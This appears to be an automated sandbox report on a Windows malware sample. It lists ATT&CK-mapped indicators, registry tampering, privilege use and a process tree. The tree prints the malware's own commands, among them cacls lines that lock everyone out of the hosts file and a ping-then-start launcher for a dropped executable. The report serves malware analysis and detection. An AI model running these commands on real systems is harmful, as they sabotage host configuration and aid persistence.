Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exesc.exenet.exenet1.execmd.execmd.execmd.execmd.exesc.exevmlbqggye.execmd.exenet1.exenetsh.execmd.exenet.execmd.exenetsh.exenet1.exenetsh.execmd.exewpcap.exenet.exeschtasks.execmd.execmd.exenetsh.execmd.exenet1.execmd.execmd.exeyittybr.execmd.execmd.execmd.exenet.execmd.execacls.exenetsh.exeschtasks.exenetsh.exePING.EXEnetsh.exenetsh.exenet.exenet1.exenet1.exesc.exe2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exenet.execacls.execacls.exenetsh.exenet.execmd.execacls.exebjfisnrbq.execmd.exenetsh.execmd.exenet.execmd.execmd.exelqvjma.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vmlbqggye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yittybr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bjfisnrbq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lqvjma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

1480 cmd.exe
4692 PING.EXE

pid	process
1480	cmd.exe
4692	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Windows\tllefmnq\yittybr.exe	nsis_installer_2
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe	nsis_installer_1
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

Processes:

btjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	yittybr.exe

Modifies registry class 14 IoCs

Processes:

yittybr.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	yittybr.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4692 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4160 schtasks.exe
1440 schtasks.exe
1308 schtasks.exe

pid	process
4692	PING.EXE

pid	process
4160	schtasks.exe
1440	schtasks.exe
1308	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

yittybr.exe

pid	process
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid process

652
652
652
652
652
652
652
652
652
652
652
652
652
652
652
Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe

pid process

800 2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe

pid	process
652
652
652
652
652
652
652
652
652
652
652
652
652
652
652

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exevfshost.exebtjlhtrlh.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	pid	process
Token: SeDebugPrivilege	800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	4032	yittybr.exe
Token: SeDebugPrivilege	3448	yittybr.exe
Token: SeDebugPrivilege	800	vfshost.exe
Token: SeDebugPrivilege	3276	btjlhtrlh.exe
Token: SeLockMemoryPrivilege	4364	ttlnnh.exe
Token: SeLockMemoryPrivilege	4364	ttlnnh.exe
Token: SeDebugPrivilege	3012	btjlhtrlh.exe
Token: SeDebugPrivilege	3652	btjlhtrlh.exe
Token: SeDebugPrivilege	2256	btjlhtrlh.exe
Token: SeDebugPrivilege	1268	btjlhtrlh.exe
Token: SeDebugPrivilege	4432	btjlhtrlh.exe
Token: SeDebugPrivilege	3968	btjlhtrlh.exe
Token: SeDebugPrivilege	2192	btjlhtrlh.exe
Token: SeDebugPrivilege	1728	btjlhtrlh.exe
Token: SeDebugPrivilege	4568	btjlhtrlh.exe
Token: SeDebugPrivilege	2228	btjlhtrlh.exe
Token: SeDebugPrivilege	1368	btjlhtrlh.exe
Token: SeDebugPrivilege	5004	btjlhtrlh.exe
Token: SeDebugPrivilege	3704	btjlhtrlh.exe
Token: SeDebugPrivilege	3968	btjlhtrlh.exe
Token: SeDebugPrivilege	4128	btjlhtrlh.exe
Token: SeDebugPrivilege	3380	btjlhtrlh.exe
Token: SeDebugPrivilege	264	btjlhtrlh.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exexohudmc.exelqvjma.exeyittybr.exeyittybr.exe

pid	process
800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
4032	yittybr.exe
4032	yittybr.exe
3448	yittybr.exe
3448	yittybr.exe
2412	xohudmc.exe
3256	lqvjma.exe
1840	yittybr.exe
1840	yittybr.exe
6340	yittybr.exe
6340	yittybr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.execmd.exeyittybr.execmd.execmd.exewpcap.exenet.exenet.exenet.exe

description	pid	process	target process
PID 800 wrote to memory of 1480	800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe	cmd.exe
PID 800 wrote to memory of 1480	800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe	cmd.exe
PID 800 wrote to memory of 1480	800	2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe	cmd.exe
PID 1480 wrote to memory of 4692	1480	cmd.exe	PING.EXE
PID 1480 wrote to memory of 4692	1480	cmd.exe	PING.EXE
PID 1480 wrote to memory of 4692	1480	cmd.exe	PING.EXE
PID 1480 wrote to memory of 4032	1480	cmd.exe	yittybr.exe
PID 1480 wrote to memory of 4032	1480	cmd.exe	yittybr.exe
PID 1480 wrote to memory of 4032	1480	cmd.exe	yittybr.exe
PID 3448 wrote to memory of 2224	3448	yittybr.exe	cmd.exe
PID 3448 wrote to memory of 2224	3448	yittybr.exe	cmd.exe
PID 3448 wrote to memory of 2224	3448	yittybr.exe	cmd.exe
PID 2224 wrote to memory of 4504	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 4504	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 4504	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 4008	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 4008	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 4008	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 3128	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 3128	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 3128	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 1824	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 1824	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 1824	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 5068	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 5068	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 5068	2224	cmd.exe	cmd.exe
PID 2224 wrote to memory of 4772	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 4772	2224	cmd.exe	cacls.exe
PID 2224 wrote to memory of 4772	2224	cmd.exe	cacls.exe
PID 3448 wrote to memory of 4996	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 4996	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 4996	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 4176	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 4176	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 4176	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 1988	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 1988	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 1988	3448	yittybr.exe	netsh.exe
PID 3448 wrote to memory of 3624	3448	yittybr.exe	cmd.exe
PID 3448 wrote to memory of 3624	3448	yittybr.exe	cmd.exe
PID 3448 wrote to memory of 3624	3448	yittybr.exe	cmd.exe
PID 3624 wrote to memory of 3632	3624	cmd.exe	wpcap.exe
PID 3624 wrote to memory of 3632	3624	cmd.exe	wpcap.exe
PID 3624 wrote to memory of 3632	3624	cmd.exe	wpcap.exe
PID 3632 wrote to memory of 4892	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 4892	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 4892	3632	wpcap.exe	net.exe
PID 4892 wrote to memory of 4388	4892	net.exe	net1.exe
PID 4892 wrote to memory of 4388	4892	net.exe	net1.exe
PID 4892 wrote to memory of 4388	4892	net.exe	net1.exe
PID 3632 wrote to memory of 3652	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 3652	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 3652	3632	wpcap.exe	net.exe
PID 3652 wrote to memory of 2968	3652	net.exe	net1.exe
PID 3652 wrote to memory of 2968	3652	net.exe	net1.exe
PID 3652 wrote to memory of 2968	3652	net.exe	net1.exe
PID 3632 wrote to memory of 900	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 900	3632	wpcap.exe	net.exe
PID 3632 wrote to memory of 900	3632	wpcap.exe	net.exe
PID 900 wrote to memory of 5052	900	net.exe	net1.exe
PID 900 wrote to memory of 5052	900	net.exe	net1.exe
PID 900 wrote to memory of 5052	900	net.exe	net1.exe
PID 3632 wrote to memory of 2680	3632	wpcap.exe	net.exe

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2064
- C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
  "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4364

C:\Users\Admin\AppData\Local\Temp\2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-28_dba35f88751d52b8da2771f8fdc51c08_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4692
- - C:\Windows\tllefmnq\yittybr.exe
    C:\Windows\tllefmnq\yittybr.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4032

C:\Windows\tllefmnq\yittybr.exe
C:\Windows\tllefmnq\yittybr.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4504
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
